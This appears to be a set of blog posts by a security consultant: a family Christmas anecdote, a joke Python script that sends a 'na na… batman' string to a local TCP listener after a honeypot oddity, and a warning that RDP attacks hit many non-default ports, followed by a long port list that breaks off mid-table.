Due to scheduling issues and general busyness, some of our kids aren’t going to be able to make it home this Christmas. Instead, they’re coming home at Thanksgiving, so we’re going to have an early Christmas in November. My wife (who puts my mother to shame when it comes to Christmas decorations) also decided to decorate early.

I visited my mom yesterday. She recognized me.

It was a good day.

When I got home from the memory care center, there was a card waiting for me.

It was an even better day.

Last night, I walked into our kitchen and discovered that my wife had placed the four Christmas candle holders I’d taken from my mom’s house on the windowsill above our sink. But she’d made a mistake - they spelled out the word NOEL.

I fixed them.

It was a perfect day.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
November 9, 2021

Addendum (11/14/21): I was thinkin’ (I do that sometimes….), maybe I was mistaken. Maybe it should have been SATAN OWNS LENO. (That would finally explain the whole Tonight Show gig.)

Better still, SATAN OWNS ELON, which would explain a lot.

And I suppose, sometimes, I am too…

The other day, I was just sitting and watching the packets hitting one of my honeypot systems stream by.

I find it soothing.

Suddenly, out of the corner of my eye, I noticed something odd fly by.

No… That didn’t actually say…!?!?

I scrolled back up and yes, indeed, I did see what I thought I saw:

(click to enlarge)

I can generally figure out what the heck is going on with teh packetz.

Not this time…

I’m stumped.

(There is some sort of routing protocol for ad-hoc mobile mesh networks that goes by the name Batman, but I don’t think that this is related to that.)

While I don’t have a clue what this is actually about, I do know this: They messed it up. Big time.

I’m really a nice guy (just ask me, I’ll tell you…). I’m all about fixin’ stuff that other people mess up. So, while I don’t know what sent that packet - or why - I’ve taken it upon myself to fix it. I give you, batman.py, a little Python script that does it right:

#!/usr/bin/env python

import socket as s
import time as t

p = 12345


def send(m):
    S = s.socket(s.AF_INET, s.SOCK_STREAM)
    S.connect(('127.0.0.1', p))
    S.sendall(m)
    S.close()


for i in range(16):
    send(b'na\n')
    t.sleep(0.5)
t.sleep(1.5)
send(b'batman\n')

The original Python script was designed to fit into a tweet. If you want to be a ‘Netmenace, you can (obviously) change the IP address and port number and confuse the heck out of your target which must (again, obviously) accept inbound TCP connections on whatever port you choose.

Alternatively, if you want to see it in action locally, you could just run:

socat - TCP-LISTEN:12345,fork,reuseaddr

(Note: If you’re really lazy, here’s a pcap file.)

There… I fixed it.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
May 10, 2021

Seriously. Don’t.

The bad guys aren’t just looking for RDP on port 3389, and moving your server off of the default port won’t keep you safe.

RDP is such a big, juicy target the bad guys are looking for it everywhere.

Here’s a list of the ports that I’ve seen RDP attacks directed at over just the past 5 days.

2     1373  2571  4618	6964  8889  14557 24412 34178 44907 46199 51273
10    1374  2572  4620	6966  8890  14565 24419 34192 44908 46200 51286
11    1375  2573  4623	6969  8891  14567 24421 34193 44909 46201 51299
13    1376  2574  4626	6970  8892  14568 24425 34199 44910 46202 51336
17    1377  2575  4632	6971  8893  14582 24426 34200 44911 46203 51350
22    1378  2576  4634	6972  8894  14614 24427 34201 44912 46204 51365
23    1379  2577  4635	6973  8895  14620 24431 34209 44914 46205 51379
25    1380  2578  4650	6975  8896  14629 24432 34240 44915 46206 51386
29    1381  2579  4656	6976  8897  14630 24433 34246 44916 46207 51388
30    1382  2580  4659	6977  8898  14631 24434 34258 44917 46208 51400
31    1383  2581  4670	6978  8899  14633 24435 34265 44918 46209 51412
32    1384  2582  4680	6982  8900  14643 24439 34278 44919 46210 51420
34    1385  2583  4689	6983  8901  14664 24449 34288 44920 46211 51435
35    1386  2584  4693	6984  8902  14678 24450 34305 44921 46212 51440
39    1387  2585  4700	6985  8903  14691 24451 34320 44922 46213 51441
41    1388  2586  4701	6986  8904  14714 24453 34341 44923 46214 51450
42    1389  2587  4705	6987  8905  14716 24469 34347 44926 46215 51455
43    1390  2588  4711	6988  8906  14718 24473 34361 44927 46216 51461
44    1391  2589  4712	6989  8907  14726 24479 34389 44928 46217 51462
45    1392  2590  4717	6990  8908  14741 24480 34402 44929 46218 51478
46    1393  2591  4719	6991  8911  14751 24481 34409 44930 46219 51483
47    1394  2592  4723	6992  8914  14773 24490 34414 44931 46220 51509
48    1395  2593  4732	6993  8917  14774 24497 34478 44932 46221 51510
49    1396  2594  4738	6994  8921  14784 24498 34495 44933 46222 51512
50    1397  2595  4743	6995  8924  14789 24499 34508 44934 46223 51518
51    1398  2596  4752	6998  8928  14799 24500 34543 44936 46224 51519
53    1399  2597  4757	6999  8933  14805 24501 34546 44937 46225 51533
54    1400  2598  4760	7000  8936  14821 24502 34553 44939 46226 51547
55    1401  2599  4769	7001  8937  14869 24505 34567 44941 46227 51553
57    1402  2600  4792	7003  8941  14870 24506 34577 44942 46228 51557
61    1403  2601  4799	7004  8942  14874 24507 34598 44943 46229 51570
62    1404  2602  4810	7005  8943  14895 24508 34646 44944 46230 51586
65    1405  2603  4823	7006  8945  14918 24509 34657 44945 46231 51589
67    1406  2604  4824	7007  8946  14927 24510 34671 44946 46232 51591
69    1407  2605  4826	7008  8949  14930 24511 34682 44947 46233 51595
71    1408  2606  4828	7009  8950  14949 24517 34694 44948 46234 51668
72    1409  2607  4831	7010  8951  14958 24519 34697 44949 46235 51681
74    1410  2608  4834	7011  8952  14966 24530 34721 44950 46236 51701
75    1411  2609  4840	7017  8953  15000 24533 34725 44951 46237 51715
76    1412  2610  4844	7018  8954  15014 24534 34745 44952 46238 51718
77    1413  2611  4847	7020  8955  15039 24535 34761 44953 46239 51732
79    1414  2612  4851	7022  8957  15044 24553 34793 44954 46240 51737
80    1415  2613  4872	7024  8958  15045 24557 34800 44955 46241 51749
82    1416  2614  4874	7027  8960  15063 24558 34810 44956 46242 51778
83    1417  2615  4883	7030  8962  15087 24559 34811 44957 46244 51804
84    1418  2616  4889	7031  8963  15094 24563 34821 44958 46245 51809
85    1419  2617  4890	7032  8964  15101 24564 34833 44959 46246 51829
86    1420  2618  4894	7033  8965  15105 24565 34842 44960 46247 51834
87    1421  2619  4899	7036  8969  15114 24566 34843 44961 46248 51843
88    1422  2620  4901	7037  8972  15141 24570 34864 44962 46249 51866
89    1423  2622  4904	7038  8974  15149 24572 34884 44963 46250 51872
90    1424  2628  4905	7040  8975  15150 24573 34886 44964 46251 51890
91    1425  2633  4916	7043  8976  15153 24574 34902 44965 46252 51893
92    1426  2652  4941	7044  8977  15157 24578 34928 44966 46254 51897
93    1427  2653  4961	7045  8979  15163 24579 34934 44967 46255 51898
94    1428  2659  4972	7046  8980  15164 24580 34942 44968 46256 51904
95    1429  2662  4979	7047  8981  15173 24583 34944 44970 46257 51909
96    1430  2666  4995	7050  8982  15186 24584 34982 44971 46258 51913
97    1431  2698  4997	7055  8983  15187 24585 34992 44972 46259 51923
98    1432  2700  4999	7060  8984  15189 24586 34993 44973 46260 51942
100   1433  2713  5000	7063  8985  15204 24587 34994 44974 46261 51946
101   1434  2723  5001	7064  8987  15212 24588 35000 44975 46262 51948
102   1435  2734  5002	7065  8988  15213 24589 35003 44976 46263 51956
103   1436  2736  5003	7066  8989  15228 24599 35004 44977 46264 51968
104   1437  2742  5004	7067  8990  15235 24609 35005 44978 46265 51972
105   1438  2744  5005	7068  8996  15237 24613 35007 44979 46266 51974
106   1439  2749  5007	7069  8998  15244 24623 35009 44980 46267 51979
107   1440  2750  5008	7070  8999  15267 24624 35012 44981 46268 51989
108   1441  2752  5009	7071  9000  15275 24625 35013 44982 46269 51996
109   1442  2760  5010	7073  9001  15279 24631 35026 44983 46270 51998
110   1443  2761  5011	7075  9002  15285 24641 35028 44984 46271 52005
112   1444  2762  5012	7076  9003  15287 24642 35030 44985 46272 52010
113   1445  2763  5013	7077  9004  15302 24643 35053 44986 46273 52030
114   1446  2764  5014	7078  9005  15313 24644 35061 44987 46274 52037
115   1447  2765  5016	7080  9006  15347 24645 35089 44988 46275 52040
116   1448  2766  5020	7088  9007  15368 24653 35091 44989 46276 52042
117   1449  2767  5022	7089  9008  15389 24654 35099 44990 46277 52072
118   1450  2768  5024	7090  9009  15446 24655 35122 44991 46278 52088
119   1451  2769  5025	7096  9010  15469 24657 35157 44992 46279 52090
120   1452  2770  5026	7097  9011  15471 24658 35177 44994 46280 52111
121   1453  2771  5027	7098  9012  15493 24661 35182 44995 46281 52115
122   1454  2772  5029	7099  9013  15505 24662 35189 44996 46282 52118
123   1455  2773  5030	7100  9014  15540 24663 35190 44998 46283 52119
124   1456  2774  5031	7101  9015  15545 24679 35200 44999 46284 52135
125   1457  2775  5032	7108  9017  15551 24680 35205 45000 46285 52142
126   1458  2776  5033	7109  9020  15557 24683 35245 45001 46286 52145
127   1459  2777  5035	7110  9021  15568 24684 35281 45002 46287 52146
129   1460  2778  5036	7111  9027  15590 24685 35313 45003 46288 52181
130   1461  2779  5037	7115  9028  15604 24689 35315 45004 46289 52184
131   1462  2780  5038	7117  9029  15656 24693 35320 45005 46290 52186
132   1463  2781  5039	7119  9030  15677 24698 35322 45006 46291 52190
133   1464  2782  5040	7120  9031  15725 24699 35349 45007 46292 52200
134   1465  2783  5041	7121  9032  15739 24700 35356 45008 46293 52202
136   1466  2784  5042	7122  9033  15801 24710 35389 45009 46294 52204
140   1467  2785  5043	7126  9037  15803 24716 35398 45010 46295 52216
141   1468  2786  5044	7127  9038  15850 24717 35401 45011 46296 52220
142   1469  2787  5045	7128  9039  15870 24718 35411 45012 46297 52223
143   1470  2788  5046	7130  9040  15914 24719 35446 45014 46298 52227
144   1471  2789  5047	7137  9041  15941 24720 35456 45015 46299 52229
145   1472  2790  5049	7139  9047  15963 24721 35459 45017 46300 52230
146   1473  2791  5050	7140  9048  15990 24727 35470 45018 46301 52235
147   1474  2792  5051	7143  9050  15995 24729 35494 45019 46302 52242
148   1475  2793  5052	7144  9055  16000 24731 35507 45020 46303 52252
149   1476  2794  5054	7145  9056  16001 24732 35510 45021 46304 52258
150   1477  2795  5055	7146  9057  16002 24733 35526 45022 46305 52264
151   1478  2796  5056	7147  9060  16010 24734 35542 45023 46306 52282
152   1479  2797  5058	7151  9066  16015 24735 35550 45024 46307 52286
155   1480  2798  5059	7153  9067  16028 24736 35551 45025 46309 52297
156   1481  2799  5060	7155  9070  16031 24743 35589 45026 46310 52302
157   1482  2800  5061	7156  9071  16036 24744 35590 45027 46311 52305
158   1483  2801  5062	7158  9072  16037 24745 35620 45028 46312 52306
159   1484  2802  5063	7160  9073  16052 24747 35631 45029 46313 52323
160   1485  2803  5064	7161  9074  16070 24751 35643 45030 46314 52330
161   1486  2804  5066	7167  9078  16072 24753 35648 45031 46315 52353
162   1487  2805  5067	7168  9080  16073 24765 35651 45032 46316 52370
163   1488  2806  5072	7169  9081  16080 24775 35684 45033 46317 52373
164   1489  2807  5081	7170  9083  16092 24784 35689 45034 46318 52377
165   1490  2808  5086	7171  9085  16097 24785 35691 45036 46319 52389
166   1491  2809  5087	7172  9086  16101 24786 35697 45037 46320 52391
167   1492  2810  5088	7173  9089  16102 24787 35700 45038 46321 52421
168   1493  2813  5089	7174  9090  16108 24788 35718 45039 46322 52430
169   1494  2823  5090	7175  9091  16109 24789 35724 45040 46323 52436
170   1495  2836  5091	7178  9092  16112 24790 35731 45041 46324 52439
171   1496  2837  5092	7180  9093  16135 24797 35734 45042 46325 52441
172   1497  2850  5093	7181  9094  16153 24798 35741 45043 46326 52442
173   1498  2853  5094	7182  9100  16169 24799 35745 45044 46327 52450
174   1499  2857  5095	7189  9103  16170 24805 35761 45045 46328 52456
175   1500  2866  5098	7190  9104  16184 24806 35771 45046 46329 52461
176   1501  2870  5099	7198  9105  16190 24807 35779 45047 46330 52476
177   1502  2873  5100	7199  9107  16205 24808 35785 45049 46331 52485
178   1503  2880  5101	7200  9108  16253 24809 35789 45050 46332 52494
179   1504  2900  5102	7203  9110  16300 24810 35833 45051 46333 52503
180   1505  2905  5103	7204  9112  16370 24811 35837 45052 46334 52504
181   1506  2910  5104	7205  9113  16383 24814 35843 45053 46335 52510
182   1507  2916  5105	7207  9114  16384 24818 35850 45054 46336 52521
183   1508  2919  5108	7211  9119  16397 24819 35853 45055 46337 52525
184   1509  2940  5109	7212  9125  16406 24820 35863 45056 46338 52526
185   1510  2945  5114	7216  9128  16419 24823 35881 45057 46339 52537
186   1511  2951  5115	7217  9131  16423 24834 35889 45058 46340 52540
187   1512  2953  5119	7218  9133  16435 24836 35893 45059 46341 52564
188   1513  2971  5120	7220  9136  16445 24837 35900 45060 46342 52568
189   1514  2978  5121	7222  9139  16451 24853 35926 45061 46343 52580
190   1515  2983  5122	7223  9140  16452 24854 35929 45062 46344 52586
191   1516  2999  5124	7224  9141  16480 24857 35971 45063 46345 52588
192   1517  3000  5126	7225  9149  16493 24858 35985 45064 46346 52600
193   1518  3001  5127	7227  9151  16500 24859 35987 45066 46347 52601
194   1519  3002  5128	7230  9152  16501 24860 36002 45067 46348 52612
195   1520  3003  5129	7235  9153  16541 24861 36005 45069 46349 52613
196   1521  3004  5130	7237  9159  16556 24862 36006 45070 46350 52614
197   1522  3005  5131	7240  9160  16558 24866 36007 45071 46351 52618
198   1523  3006  5133	7241  9165  16595 24875 36033 45072 46352 52661
199   1524  3007  5134	7242  9168  16609 24876 36040 45073 46353 52666
200   1525  3008  5135	7244  9169  16637 24877 36055 45074 46354 52679
201   1526  3009  5136	7246  9170  16644 24878 36057 45075 46355 52707
202   1527  3011  5137	7249  9171  16673 24879 36070 45076 46356 52709
203   1528  3012  5139	7250  9175  16704 24880 36081 45077 46357 52730
204   1529  3013  5140	7251  9176  16713 24887 36083 45079 46358 52743
205   1530  3014  5141	7252  9177  16719 24888 36110 45080 46359 52748
206   1531  3015  5142	7255  9178  16721 24889 36132 45081 46360 52761
207   1532  3016  5143	7256  9179  16740 24890 36147 45082 46361 52777
208   1533  3017  5144	7257  9180  16761 24891 36151 45083 46362 52781
209   1534  3019  5145	7261  9182  16795 24892 36152 45084 46363 52791
210   1535  3020  5146	7262  9184  16797 24899 36160 45085 46364 52793
211   1536  3021  5147	7263  9185  16805 24901 36162 45086 46365 52801
212   1537  3022  5148	7266  9186  16812 24902 36177 45087 46366 52823
213   1538  3023  5150	7267  9189  16839 24908 36197 45088 46367 52831
214   1539  3024  5151	7270  9190  16928 24911 36209 45089 46368 52861
215   1540  3025  5152	7271  9191  16943 24919 36214 45090 46369 52914
216   1541  3026  5153	7272  9192  16977 24921 36217 45091 46370 52954
217   1542  3027  5156	7273  9198  16989 24931 36234 45092 46371 52957
218   1543  3028  5157	7274  9199  16997 24935 36235 45093 46372 52972
219   1544  3029  5158	7275  9200  17001 24936 36247 45094 46373 52992
220   1545  3030  5159	7277  9201  17005 24937 36251 45095 46375 52997
221   1546  3032  5160	7279  9215  17009 24947 36252 45096 46376 52999
222   1547  3033  5161	7282  9219  17039 24948 36262 45097 46377 53005
223   1548  3035  5162	7287  9223  17051 24949 36273 45098 46378 53053
224   1549  3036  5163	7288  9224  17071 24956 36305 45100 46379 53089
225   1550  3037  5165	7290  9225  17105 24957 36317 45101 46380 53122
226   1551  3038  5166	7294  9229  17106 24958 36318 45102 46381 53128
227   1552  3039  5168	7295  9230  17109 24959 36321 45103 46382 53129
228   1553  3040  5169	7296  9231  17112 24960 36336 45104 46383 53131
229   1554  3041  5170	7299  9232  17126 24961 36355 45105 46384 53135
230   1555  3042  5171	7300  9233  17143 24962 36358 45106 46385 53162
231   1556  3043  5172	7306  9238  17168 24963 36389 45107 46386 53179
232   1557  3044  5176	7307  9244  17169 24964 36400 45108 46387 53182
233   1558  3045  5177	7309  9245  17175 24967 36417 45109 46389 53205
234   1559  3046  5178	7310  9246  17180 24969 36423 45110 46390 53211
235   1560  3047  5181	7311  9249  17193 24973 36448 45111 46391 53253
236   1561  3048  5184	7312  9250  17210 24976 36461 45112 46392 53268
237   1562  3049  5185	7313  9251  17216 24991 36476 45113 46393 53270
238   1563  3050  5186	7314  9252  17229 24998 36481 45114 46394 53293
239   1564  3051  5188	7317  9253  17233 24999 36556 45115 46396 53301
240   1565  3052  5189	7319  9254  17283 25000 36557 45116 46397 53321
241   1566  3053  5190	7322  9255  17286 25002 36588 45117 46398 53329
242   1567  3054  5191	7324  9259  17291 25004 36593 45118 46399 53331
243   1568  3055  5192	7325  9260  17316 25005 36613 45120 46400 53337
244   1569  3056  5193	7326  9261  17318 25015 36625 45121 46401 53341
245   1570  3057  5194	7327  9262  17380 25018 36649 45122 46402 53349
246   1571  3058  5195	7328  9287  17410 25030 36656 45123 46404 53357
247   1572  3059  5196	7329  9289  17455 25031 36657 45126 46405 53366
248   1573  3060  5197	7330  9292  17481 25033 36659 45127 46406 53377
249   1574  3061  5198	7333  9296  17483 25046 36664 45128 46409 53378
250   1575  3063  5199	7335  9297  17491 25063 36677 45129 46410 53380
251   1576  3064  5200	7336  9298  17501 25077 36698 45130 46411 53388
252   1577  3066  5201	7337  9299  17502 25081 36749 45131 46413 53389
253   1578  3067  5202	7338  9300  17504 25094 36781 45132 46414 53390
254   1579  3068  5203	7345  9302  17505 25102 36785 45133 46415 53402
255   1580  3069  5204	7348  9305  17521 25103 36789 45135 46416 53409
256   1581  3070  5205	7349  9308  17534 25111 36790 45136 46419 53421
257   1582  3071  5206	7350  9310  17535 25112 36791 45137 46420 53425
258   1583  3072  5207	7351  9311  17548 25121 36806 45138 46421 53432
259   1584  3073  5208	7353  9312  17552 25141 36832 45139 46422 53485
260   1585  3074  5209	7357  9313  17572 25142 36843 45141 46423 53489
261   1586  3076  5210	7359  9318  17635 25177 36845 45142 46424 53503
262   1587  3078  5211	7363  9319  17642 25186 36850 45143 46425 53506
263   1588  3079  5212	7365  9320  17649 25189 36851 45144 46426 53541
264   1589  3080  5213	7366  9321  17655 25209 36875 45145 46427 53577
265   1590  3081  5214	7367  9322  17666 25231 36904 45146 46428 53600
266   1591  3082  5215	7368  9323  17669 25251 36906 45147 46429 53610
267   1592  3083  5217	7370  9324  17680 25256 36915 45148 46430 53615
268   1593  3085  5219	7371  9325  17682 25257 36921 45149 46431 53624
269   1594  3086  5220	7372  9326  17690 25286 36925 45151 46432 53628
270   1595  3087  5221	7373  9327  17703 25304 36928 45153 46433 53630
271   1596  3088  5222	7375  9329  17731 25345 36931 45154 46434 53654
272   1597  3089  5223	7377  9333  17735 25389 36969 45155 46436 53665
273   1598  3090  5224	7380  9341  17744 25396 36974 45156 46437 53713
274   1599  3092  5226	7381  9343  17748 25399 36977 45157 46438 53714
275   1600  3094  5227	7382  9349  17765 25400 36987 45158 46439 53721
276   1601  3095  5228	7383  9352  17776 25425 36995 45159 46440 53725
277   1602  3096  5229	7387  9353  17799 25436 37002 45160 46441 53750
278   1603  3097  5231	7388  9354  17800 25447 37005 45161 46442 53761
279   1604  3098  5234	7389  9359  17817 25448 37025 45162 46443 53762
280   1605  3100  5236	7390  9360  17861 25472 37055 45163 46444 53771
281   1606  3101  5237	7391  9361  17890 25478 37073 45164 46445 53774
282   1607  3102  5239	7392  9362  17919 25489 37089 45165 46446 53791
283   1608  3103  5243	7393  9372  17920 25496 37097 45166 46447 53801
284   1609  3104  5244	7395  9373  17921 25532 37103 45167 46448 53802
285   1610  3105  5245	7396  9374  17930 25555 37107 45168 46449 53808
286   1611  3106  5248	7397  9375  17963 25567 37111 45169 46450 53809
287   1612  3107  5251	7398  9379  17970 25592 37115 45170 46451 53810
288   1613  3108  5253	7399  9380  17978 25593 37139 45171 46452 53822
289   1614  3109  5254	7400  9381  17989 25600 37158 45172 46453 53857
290   1615  3110  5256	7402  9382  18000 25641 37164 45173 46454 53898
291   1616  3111  5257	7403  9383  18001 25667 37165 45174 46455 53905
292   1617  3112  5258	7404  9385  18002 25676 37179 45175 46456 53910
293   1618  3113  5259	7406  9387  18005 25680 37187 45176 46457 53924
294   1619  3114  5260	7407  9388  18010 25681 37190 45177 46458 53925
295   1620  3115  5261	7408  9389  18011 25683 37198 45178 46459 53936
296   1621  3116  5262	7410  9390  18016 25688 37217 45180 46460 53943
297   1622  3118  5264	7411  9392  18019 25714 37229 45182 46461 53946
298   1623  3119  5270	7412  9393  18026 25734 37235 45183 46463 53962
299   1624  3120  5271	7413  9394  18034 25766 37237 45184 46464 53965
300   1625  3121  5272	7418  9397  18074 25782 37251 45185 46465 53979
301   1626  3122  5282	7424  9398  18083 25804 37262 45186 46466 53991
302   1627  3123  5289	7427  9399  18085 25825 37265 45187 46467 53999
303   1628  3124  5290	7429  9400  18091 25830 37266 45189 46469 54000
304   1629  3125  5291	7430  9401  18101 25853 37283 45190 46470 54005
305   1630  3126  5293	7431  9402  18114 25880 37284 45191 46471 54018
306   1631  3127  5299	7433  9409  18117 25912 37303 45192 46472 54019
307   1632  3128  5301	7434  9410  18123 25913 37343 45194 46473 54037
308   1633  3129  5305	7437  9411  18129 25925 37351 45195 46474 54042
309   1634  3130  5309	7440  9416  18131 25926 37361 45196 46475 54049
310   1635  3131  5310	7444  9417  18136 25928 37371 45197 46476 54078
311   1636  3132  5311	7446  9422  18141 25939 37387 45198 46477 54083
312   1637  3133  5312	7447  9423  18149 25961 37389 45199 46479 54087
313   1638  3134  5314	7448  9428  18157 25963 37399 45200 46480 54095
314   1639  3135  5315	7450  9434  18158 25968 37421 45201 46481 54097
315   1640  3136  5317	7453  9439  18159 25974 37435 45203 46482 54111
316   1641  3137  5319	7454  9445  18163 25976 37447 45204 46483 54113
317   1642  3138  5322	7455  9446  18169 25980 37495 45205 46484 54122
318   1643  3139  5324	7457  9447  18170 26001 37502 45206 46485 54145
319   1644  3140  5328	7459  9456  18184 26003 37513 45208 46486 54175
320   1645  3141  5332	7462  9464  18197 26005 37523 45209 46487 54183
322   1646  3142  5338	7464  9466  18199 26014 37524 45210 46488 54194
323   1647  3143  5340	7465  9467  18208 26019 37549 45211 46489 54198
324   1648  3144  5346	7466  9468  18210 26029 37551 45212 46491 54205
325   1649  3145  5347	7467  9470  18211 26034 37574 45213 46492 54215
326   1650  3146  5348	7471  9472  18229 26112 37580 45214 46494 54217
327   1651  3147  5349	7472  9473  18258 26120 37586 45215 46495 54219
328   1652  3148  5352	7473  9474  18260 26145 37622 45216 46496 54231
329   1653  3149  5353	7474  9476  18272 26160 37667 45217 46497 54243
330   1654  3150  5357	7476  9478  18273 26166 37675 45218 46498 54245
331   1655  3151  5363	7477  9479  18303 26214 37687 45219 46499 54258
332   1656  3152  5364	7480  9480  18304 26220 37697 45220 46500 54271
333   1657  3153  5366	7481  9481  18306 26245 37715 45221 46501 54272
334   1658  3154  5374	7482  9483  18333 26268 37718 45222 46502 54281
335   1659  3155  5375	7488  9485  18338 26275 37723 45223 46503 54289
336   1660  3156  5376	7489  9487  18339 26312 37735 45225 46504 54290
337   1661  3157  5377	7490  9488  18345 26319 37745 45226 46505 54297
338   1662  3158  5389	7491  9489  18365 26335 37747 45227 46506 54300
339   1663  3159  5390	7492  9493  18369 26360 37778 45229 46507 54303
340   1664  3160  5391	7494  9494  18375 26366 37779 45231 46508 54318
341   1665  3161  5398	7499  9495  18388 26369 37796 45232 46509 54320
342   1666  3162  5399	7500  9499  18400 26384 37811 45233 46510 54321
343   1667  3163  5401	7501  9501  18402 26385 37827 45234 46512 54326
344   1668  3164  5402	7502  9502  18415 26390 37829 45235 46513 54327
345   1669  3165  5403	7503  9508  18417 26400 37867 45236 46514 54361
346   1670  3166  5421	7505  9509  18422 26401 37895 45237 46515 54362
347   1671  3167  5423	7508  9510  18448 26403 37907 45238 46516 54377
348   1672  3168  5429	7509  9512  18450 26411 37910 45239 46517 54386
349   1673  3169  5430	7510  9513  18452 26424 37914 45240 46518 54387
350   1674  3170  5432	7511  9518  18465 26425 37915 45241 46519 54388
351   1675  3171  5433	7515  9523  18493 26426 37916 45242 46520 54389
352   1676  3172  5434	7516  9524  18511 26452 37927 45243 46521 54396
353   1677  3173  5436	7517  9525  18546 26454 37975 45244 46522 54398
354   1678  3174  5437	7522  9526  18560 26459 37980 45245 46523 54399
355   1679  3177  5438	7524  9527  18594 26481 37981 45246 46524 54402
356   1680  3178  5439	7528  9528  18637 26496 37984 45247 46525 54431
357   1681  3179  5440	7529  9529  18654 26500 37998 45248 46526 54434
358   1682  3180  5443	7530  9532  18685 26507 38000 45249 46527 54448
359   1683  3181  5445	7531  9533  18703 26511 38001 45250 46528 54450
360   1684  3182  5448	7533  9534  18725 26528 38002 45251 46529 54451
361   1685  3183  5451	7536  9538  18727 26544 38005 45252 46530 54471
362   1686  3184  5452	7537  9540  18751 26550 38023 45253 46531 54480
363   1687  3185  5460	7543  9548  18760 26555 38081 45254 46532 54484
364   1688  3186  5461	7544  9559  18767 26556 38101 45255 46533 54487
365   1689  3187  5462	7545  9560  18781 26561 38102 45256 46535 54492
366   1690  3188  5463	7546  9561  18803 26575 38108 45257 46537 54513
367   1691  3189  5464	7547  9562  18812 26577 38118 45258 46538 54527
368   1692  3190  5465	7548  9563  18818 26592 38119 45259 46539 54542
369   1693  3191  5479	7549  9564  18828 26595 38124 45260 46540 54545
370   1694  3192  5480	7550  9565  18829 26624 38130 45261 46541 54563
371   1695  3194  5483	7551  9566  18834 26625 38155 45262 46542 54564
372   1696  3195  5484	7552  9567  18841 26626 38160 45263 46543 54577
373   1697  3196  5485	7553  9568  18842 26681 38164 45264 46544 54578
374   1698  3197  5487	7554  9570  18847 26703 38185 45265 46545 54596
375   1699  3200  5488	7555  9572  18864 26705 38195 45266 46548 54601
376   1700  3201  5490	7556  9574  18868 26714 38200 45268 46549 54609
377   1701  3202  5493	7557  9575  18877 26730 38203 45269 46550 54616
378   1702  3203  5500	7559  9576  18882 26751 38223 45270 46551 54618
379   1703  3204  5501	7564  9583  18889 26767 38224 45271 46552 54626
380   1704  3205  5502	7565  9586  18891 26769 38231 45272 46553 54644
381   1705  3206  5505	7566  9587  18895 26788 38250 45273 46554 54646
382   1706  3207  5506	7567  9588  18905 26789 38256 45274 46555 54665
383   1707  3208  5507	7568  9589  18910 26801 38262 45275 46556 54674
384   1708  3210  5510	7569  9590  18912 26843 38275 45276 46557 54699
385   1709  3212  5512	7570  9591  18922 26874 38289 45277 46558 54722
386   1710  3213  5513	7572  9592  18925 26906 38299 45278 46559 54748
387   1711  3214  5515	7575  9593  18928 26913 38311 45279 46560 54760
388   1712  3215  5518	7576  9594  18943 26945 38347 45280 46561 54770
389   1713  3216  5519	7577  9595  18952 26970 38381 45281 46562 54774
390   1714  3217  5520	7578  9599  18964 27000 38386 45282 46563 54785
391   1715  3218  5522	7581  9600  18969 27004 38387 45283 46564 54791
392   1716  3219  5531	7582  9607  18988 27011 38389 45284 46565 54815
393   1717  3220  5535	7585  9608  19005 27017 38391 45285 46566 54816
394   1718  3221  5537	7587  9609  19012 27030 38393 45287 46567 54818
395   1719  3222  5540	7588  9610  19013 27032 38394 45288 46568 54824
396   1720  3223  5544	7589  9613  19018 27050 38395 45290 46569 54833
397   1721  3224  5546	7590  9614  19025 27060 38398 45291 46570 54840
398   1722  3225  5547	7591  9615  19046 27091 38418 45292 46571 54850
399   1723  3226  5550	7592  9616  19062 27109 38426 45293 46572 54869
400   1724  3227  5551	7593  9620  19072 27125 38500 45294 46573 54880
401   1725  3228  5553	7600  9622  19073 27139 38503 45295 46574 54883
402   1726  3229  5555	7606  9623  19082 27140 38514 45296 46575 54886
403   1727  3230  5560	7607  9624  19084 27142 38515 45297 46577 54911
404   1728  3231  5561	7608  9626  19094 27146 38546 45298 46578 54914
405   1729  3232  5562	7611  9627  19099 27230 38600 45299 46579 54924
406   1730  3234  5563	7613  9630  19121 27252 38620 45300 46580 54959
407   1731  3235  5565	7616  9632  19135 27272 38627 45301 46581 54962
408   1732  3236  5566	7618  9633  19147 27290 38630 45302 46582 54980
409   1733  3237  5567	7619  9634  19169 27302 38684 45303 46583 54995
410   1734  3238  5579	7620  9635  19178 27307 38707 45304 46584 54998
411   1735  3239  5580	7622  9636  19189 27329 38715 45305 46585 55000
412   1736  3240  5581	7627  9638  19200 27357 38729 45306 46586 55001
413   1737  3241  5582	7628  9639  19201 27382 38730 45308 46587 55003
414   1738  3242  5583	7629  9647  19208 27405 38731 45309 46588 55005
415   1739  3243  5584	7630  9649  19220 27408 38741 45310 46589 55007
416   1740  3244  5585	7631  9650  19233 27426 38852 45311 46590 55008
417   1741  3245  5586	7632  9651  19247 27433 38880 45312 46591 55009
418   1742  3246  5587	7633  9652  19261 27453 38884 45313 46592 55010
419   1743  3247  5588	7634  9653  19265 27454 38888 45314 46593 55021
420   1744  3248  5589	7636  9654  19270 27470 38921 45315 46596 55031
421   1745  3249  5590	7642  9656  19318 27501 38927 45316 46597 55039
422   1746  3250  5591	7643  9660  19345 27504 38933 45317 46598 55041
423   1747  3251  5592	7644  9661  19361 27505 38946 45318 46599 55050
424   1748  3252  5593	7645  9662  19366 27518 38949 45319 46600 55055
425   1749  3253  5594	7646  9663  19399 27566 38950 45320 46602 55058
426   1750  3254  5595	7648  9665  19414 27574 38965 45321 46603 55066
427   1751  3255  5596	7653  9669  19416 27610 38967 45322 46604 55087
428   1752  3256  5597	7654  9670  19440 27614 38989 45323 46605 55088
429   1753  3257  5598	7655  9675  19457 27638 38993 45324 46606 55092
430   1754  3258  5599	7656  9676  19463 27645 38996 45325 46607 55093
431   1755  3259  5600	7660  9677  19486 27662 39000 45326 46608 55101
432   1756  3260  5601	7662  9678  19505 27670 39001 45327 46609 55102
433   1757  3261  5603	7663  9679  19511 27703 39031 45328 46613 55103
434   1758  3263  5604	7664  9680  19534 27714 39042 45329 46615 55116
435   1759  3264  5605	7665  9681  19570 27718 39109 45330 46616 55118
436   1760  3265  5610	7670  9682  19584 27741 39118 45331 46617 55121
437   1761  3266  5612	7671  9685  19590 27770 39123 45332 46618 55128
438   1762  3267  5615	7672  9686  19599 27787 39137 45333 46619 55133
